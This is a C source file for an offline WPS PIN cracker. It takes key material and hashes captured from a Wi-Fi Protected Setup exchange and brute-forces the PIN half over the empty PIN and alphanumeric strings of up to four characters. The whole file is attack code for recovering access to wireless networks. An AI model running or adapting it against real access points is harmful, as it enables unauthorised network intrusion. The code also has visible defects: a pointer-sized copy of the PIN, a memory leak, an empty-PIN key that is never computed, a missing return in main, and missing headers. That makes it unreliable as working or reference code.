#include <stdio.h>
#include <stdint.h>
#include <getopt.h>

#include "bruteforce.h"
#include "crypto/hmac_sha256.c"

static const char *option_string = "e:r:s:a:z:v:SflVh?";
static const struct option long_options[] = {
        {"pke",     required_argument, 0, 'e'},
        {"pkr",     required_argument, 0, 'r'},
        {"e-hash",  required_argument, 0, 's'},
        {"authkey", required_argument, 0, 'a'},
        {"e-s",     required_argument, 0, 'z'},
        {"help",    no_argument,       0, 0},
        {0,         no_argument,       0, 'h'},
        {0, 0,                         0, 0}
};

/* Return non-zero if pin half is correct, zero otherwise */
static int check_pin_half(const struct hmac_ctx *hctx, const char pinhalf[], uint8_t *psk, const uint8_t *es, struct global *wps, const uint8_t *ehash)
{
	uint8_t buffer[WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PKEY_LEN * 2];
	uint8_t result[WPS_HASH_LEN];

	hmac_sha256_yield(hctx, (uint8_t *)pinhalf, strlen(pinhalf), psk);
	memcpy(buffer, es, WPS_SECRET_NONCE_LEN);
	memcpy(buffer + WPS_SECRET_NONCE_LEN, psk, WPS_PSK_LEN);
	memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN, wps->pke, WPS_PKEY_LEN);
	memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PKEY_LEN, wps->pkr, WPS_PKEY_LEN);
	hmac_sha256_yield(hctx, buffer, sizeof buffer, result);

	return !memcmp(result, ehash, WPS_HASH_LEN);
}

/* Return non-zero if pin half is correct, zero otherwise */
static int check_empty_pin_half(const uint8_t *es, struct global *wps, const uint8_t *ehash)
{
	uint8_t buffer[WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PKEY_LEN * 2];
	uint8_t result[WPS_HASH_LEN];

	memcpy(buffer, es, WPS_SECRET_NONCE_LEN);
	memcpy(buffer + WPS_SECRET_NONCE_LEN, wps->empty_psk, WPS_PSK_LEN);
	memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN, wps->pke, WPS_PKEY_LEN);
	memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PKEY_LEN, wps->pkr, WPS_PKEY_LEN);
	hmac_sha256_full(wps->authkey, WPS_AUTHKEY_LEN, buffer, sizeof buffer, result);

	return !memcmp(result, ehash, WPS_HASH_LEN);
}

/* Return 1 if numeric pin_half half found, -1 if empty pin_half found, 0 if not found */
static int crack_pin_half(struct global *wps, char *pin)
{
	*pin = 0;
	const uint8_t *es =  wps->e_s;

	if (check_empty_pin_half(es, wps, wps->e_hash)) {
        printf("Empty PIN checked\n");
        memcpy(wps->psk, wps->empty_psk, WPS_HASH_LEN);
        return -1;
    }

	unsigned first_half;
	uint8_t psk[WPS_HASH_LEN];
	struct hmac_ctx hc;
	hmac_sha256_init(&hc, wps->authkey, WPS_AUTHKEY_LEN);

	/* for (first_half = 0; first_half < 10000; first_half++) {
		uint_to_char_array(first_half, 4, pin);
		if (check_pin_half(&hc, pin, psk, es, wps, wps->e_hash)) {
            pin[4] = 0;
			memcpy(wps->psk, psk, sizeof psk);
			return 1;
		}
	} */

	/* Permutations with repetition */
	for (unsigned gp_len = 1; gp_len <= 4; ++gp_len) {
        char *list = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
        unsigned list_len = strlen(list);
        char *gp = calloc(gp_len+1, sizeof(char));
        int total_n = powu(list_len, gp_len);
        int i, j;
        for (i = 0; i < total_n; ++i){
            int n = i;
            for (j = 0; j < gp_len; ++j) {
                gp[gp_len -j -1] = list[n % list_len];
                n /= list_len;
            }
            if (check_pin_half(&hc, gp, psk, es, wps, wps->e_hash)) {
                pin[4] = 0; /* Make sure pin_half string is zero-terminated */
                memcpy(wps->psk, psk, sizeof psk);
                memcpy(wps->pin, gp, sizeof gp);
                return 1;
            }
        }
        free(gp);
	}

	return 0;
}

int main(int argc, char **argv) {
    struct global *wps;
    if ((wps = calloc(1, sizeof(struct global)))) {
        wps->error = calloc(256, 1);
        if (!wps->error)
            goto memory_err;
        wps->error[0] = '\n';
    }
    else {
memory_err:
        fprintf(stderr, "\n [X] Memory allocation error!\n");
        return MEM_ERROR;
    }
    int opt;
    int long_index = 0;

    opt = getopt_long(argc, argv, option_string, long_options, &long_index);
    uint_fast8_t c = 0;
    while (opt != -1) {
        c++;
        switch (opt) {
            case 'e':
                wps->pke = malloc(WPS_PKEY_LEN);
                if (!wps->pke)
                    goto memory_err;
                if (hex_string_to_byte_array(optarg, wps->pke, WPS_PKEY_LEN)) {
                    snprintf(wps->error, 256, "\n [!] Bad enrollee public key -- %s\n\n", optarg);
                    goto usage_err;
                }
                break;
            case 'r':
                wps->pkr = malloc(WPS_PKEY_LEN);
                if (!wps->pkr)
                    goto memory_err;
                if (hex_string_to_byte_array(optarg, wps->pkr, WPS_PKEY_LEN)) {
                    snprintf(wps->error, 256, "\n [!] Bad registrar public key -- %s\n\n", optarg);
                    goto usage_err;
                }
                break;
            case 's':
                wps->e_hash = malloc(WPS_HASH_LEN);
                if (!wps->e_hash)
                    goto memory_err;
                if (hex_string_to_byte_array(optarg, wps->e_hash, WPS_HASH_LEN)) {
                    snprintf(wps->error, 256, "\n [!] Bad hash -- %s\n\n", optarg);
                    goto usage_err;
                }
                break;
            case 'a':
                wps->authkey = malloc(WPS_AUTHKEY_LEN);
                if (!wps->authkey)
                    goto memory_err;
                if (hex_string_to_byte_array(optarg, wps->authkey, WPS_AUTHKEY_LEN)) {
                    snprintf(wps->error, 256, "\n [!] Bad authentication session key -- %s\n\n", optarg);
                    goto usage_err;
                }
                break;
            case 'z':
                wps->e_s = malloc(WPS_NONCE_LEN);
                if (!wps->e_s)
                    goto memory_err;
                if (hex_string_to_byte_array(optarg, wps->e_s, WPS_NONCE_LEN)) {
                    snprintf(wps->error, 256, "\n [!] Bad Enrolee S -- %s\n\n", optarg);
                    goto usage_err;
                }
                break;
            case 'h':
                goto usage_err;
            case  0 :
                goto usage_err;
            case '?':
            default:
                fprintf(stderr, "Run %s -h for help.\n", argv[0]);
                free(wps->error);
                free(wps);
                return ARG_ERROR;
        }
        opt = getopt_long(argc, argv, option_string, long_options, &long_index);
    }
    if (argc - optind != 0) {
        snprintf(wps->error, 256, "\n [!] Unknown extra argument(s)!\n\n");
        goto usage_err;
    }
    else {
        if (!c) {
usage_err:
            fprintf(stderr, usage, argv[0], wps->error);

            free(wps->pke);
            free(wps->pkr);
            free(wps->e_hash);
            free(wps->authkey);
            free(wps->e_bssid);
            free(wps->error);
            free(wps);

            return ARG_ERROR;
        }
    }

    wps->psk = malloc(WPS_HASH_LEN);          if (!wps->psk)       goto memory_err;
    wps->empty_psk = malloc(WPS_HASH_LEN);    if (!wps->empty_psk) goto memory_err;

    if (crack_pin_half(wps, wps->pin) == 1) {
        printf("PIN half found: %s\n", wps->pin);
        return PIN_FOUND;
    }
}